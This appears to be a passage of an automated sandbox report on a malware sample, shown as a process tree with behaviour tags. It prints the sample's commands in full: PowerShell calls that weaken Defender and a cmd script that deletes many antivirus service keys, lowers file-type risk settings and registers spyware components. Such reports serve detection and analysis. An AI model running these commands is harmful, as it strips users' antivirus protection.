                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6644
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6888
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                            3⤵
                                                                                                                                                              PID:7008
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6388
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6352
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:2780
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:7040
                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                      "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:6544
                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6892
                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7120
                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6380
                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                          PID:6744
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                          PID:6820
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:5512
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5632
                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                              PID:5948
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6288
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                PID:5384
                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:6992
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:4724
                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  PID:5640
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                  PID:7532
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:6344
                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                  PID:6808
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:5620
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:7576
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:2004
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:6964
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:704
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:1552
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:6212
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:3764
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:7708
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:5580
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:4508
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:4248
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                    PID:6640
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Modifies registry class
